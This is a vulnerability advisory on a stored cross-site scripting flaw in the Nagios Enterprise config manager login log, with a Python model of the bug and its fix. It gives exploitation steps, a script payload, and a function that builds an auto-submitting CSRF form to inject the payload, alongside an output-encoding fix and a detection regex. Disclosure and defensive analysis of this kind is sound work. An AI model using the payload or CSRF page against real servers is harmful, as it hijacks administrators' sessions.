Nagios Enterprise Config Manager Log Persistent XSS

by Adam Baldwin

Summary

A persistent (stored) cross-site scripting vulnerability exists in the configuration manager shipped with Nagios Enterprise 2011R3.2. The username submitted to the Nagios Core Config Manager login page (http://nagios.example.com/nagiosql/index.php) is written to the config manager log without output encoding, so any HTML or script it contains is rendered when the log is viewed.

No authentication is required to inject the payload: a failed login attempt is enough. The payload only executes when an authenticated user views the config manager log. If the attacker cannot reach the Nagios server directly (for example, it is not exposed publicly), the payload can still be injected through CSRF, because the login form has no CSRF validation and can be submitted from any page the victim's browser loads.

Example exploitation

  • Attacker visits the login page.
  • Attacker enters the payload in the username field. Example: <script>alert(1)</script>
  • Attacker submits the form; authentication fails, and the username is logged as-is.
  • Victim logs into Nagios and visits the config manager log in the configuration manager.
  • Attacker's payload executes in the browser of the config manager user, with that user's session.
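
The chain above, modelled in Python as an added example that is not Nagios or NagiosQL code: a failed login stores the raw username, the log page echoes it unencoded (the flaw), the fixed renderer encodes on output, and a small detection helper flags failed-login usernames that contain markup. The CSRF variant is shown as an auto-submitting form; the form field names (`username`, `password`) and the log layout are assumptions for illustration, not taken from the product.

```python
"""Model of the NagiosQL login-log stored XSS.

Constructed example, not Nagios code. Field names, log layout and the
detection pattern are assumptions used to illustrate the bug and the fix.
"""
import html
import re
from dataclasses import dataclass

PAYLOAD = "<script>alert(1)</script>"  # payload quoted in the advisory


@dataclass
class LogEntry:
    username: str  # attacker-controlled, copied verbatim from the login form
    result: str    # "failed" or "ok"


def record_failed_login(log, username):
    """Server side of the bug: the username is stored unmodified. No
    authentication is needed because the login attempt is allowed to fail."""
    log.append(LogEntry(username=username, result="failed"))
    return log


def render_log_vulnerable(log):
    """Reproduces the flaw: the stored username is interpolated into HTML
    with no output encoding, so the viewer's browser executes <script>."""
    rows = "".join(
        f"<tr><td>{e.username}</td><td>{e.result}</td></tr>" for e in log
    )
    return f"<table>{rows}</table>"


def render_log_fixed(log):
    """Fix: HTML-encode every attacker-controlled value at the point it is
    written into the page. quote=True also covers ' and " so a payload
    cannot break out of an attribute value."""
    rows = "".join(
        f"<tr><td>{html.escape(e.username, quote=True)}</td>"
        f"<td>{html.escape(e.result, quote=True)}</td></tr>"
        for e in log
    )
    return f"<table>{rows}</table>"


def csrf_injection_page(target, username_field="username",
                        password_field="password"):
    """Attacker side of the CSRF variant: a page that, when loaded by a
    victim who can reach the Nagios server, posts the payload to the login
    form. The payload is entity-encoded inside the value attribute so the
    attacker's page parses cleanly; the browser decodes it back to the raw
    string when it submits the form. Field names are assumed, not Nagios'."""
    return (
        '<html><body onload="document.forms[0].submit()">'
        f'<form method="POST" action="{html.escape(target, quote=True)}">'
        f'<input type="hidden" name="{html.escape(username_field, quote=True)}" '
        f'value="{html.escape(PAYLOAD, quote=True)}">'
        f'<input type="hidden" name="{html.escape(password_field, quote=True)}" '
        'value="x">'
        "</form></body></html>"
    )


# Detection heuristic (assumption): login names are identifiers, so angle
# brackets, quotes, javascript: URLs or on*= handlers in a failed-login
# username are a sign someone is trying this injection.
SUSPICIOUS = re.compile(r"[<>\"']|javascript:|on\w+\s*=", re.IGNORECASE)


def flag_suspicious_usernames(log):
    """Return failed-login usernames that look like markup rather than names."""
    return [
        e.username
        for e in log
        if e.result == "failed" and SUSPICIOUS.search(e.username)
    ]


if __name__ == "__main__":
    log = record_failed_login([], PAYLOAD)
    record_failed_login(log, "nagiosadmin")
    print("vulnerable:", render_log_vulnerable(log))
    print("fixed:     ", render_log_fixed(log))
    print("flagged:   ", flag_suspicious_usernames(log))
    print(csrf_injection_page("http://nagios.example.com/nagiosql/index.php"))
```

The fix is the point to carry back to the real application: encode at the output sink (the log page), not at the input, since the same username may later be written into other contexts. Rejecting markup at login time, as the detection pattern does, is a useful alert source but not a substitute for output encoding.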

Nagios said that this would be addressed in the Nagios XI 3.3 release.